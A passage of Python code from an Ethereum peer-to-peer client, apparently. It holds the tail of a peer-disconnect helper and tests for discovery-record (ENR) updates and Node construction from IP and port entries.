    for peer_info in response.peers:
        if target != peer_info.session.remote:
            continue
        await self.event_bus.broadcast(
            DisconnectFromPeerCommand(
                peer_info,
                DisconnectReason.DISCONNECT_REQUESTED,
            ),
        )
        return True
    return False
async def test_lookup_and_maybe_update_enr_existing_node_different_address():
    discovery = MockDiscoveryService([])
    private_key = PrivateKeyFactory()
    original_address = AddressFactory()

    # Seed the DB with an ENR for the node at its original address.
    original_enr = ENRFactory(
        private_key=private_key.to_bytes(), address=original_address)
    discovery.enr_db.set_enr(original_enr)

    # Looking the node up with a *different* address creates a stub ENR for
    # the new address and replaces the stored record.
    changed_address = AddressFactory()
    stub_enr = discovery.lookup_and_maybe_update_enr(
        private_key.public_key, changed_address)
    assert stub_enr != original_enr
    assert stub_enr.public_key == original_enr.public_key
    assert stub_enr.sequence_number == 0
    assert Node(stub_enr).address == changed_address
    assert discovery.enr_db.get_enr(original_enr.node_id) == stub_enr
def test_node_constructor():
    """A node built from an ENR with explicit ip/udp-port entries exposes them,
    with the tcp port defaulting to the udp port."""
    private_key = PrivateKeyFactory()
    packed_ip = socket.inet_aton(IPAddressFactory.generate())
    port = 30303
    record = ENRFactory(
        private_key=private_key.to_bytes(),
        custom_kv_pairs={IP_V4_ADDRESS_ENR_KEY: packed_ip, UDP_PORT_ENR_KEY: port})

    built = Node(record)

    assert built.id == keccak(private_key.public_key.to_bytes())
    assert built.address.ip_packed == packed_ip
    assert built.address.tcp_port == port
    assert built.address.udp_port == port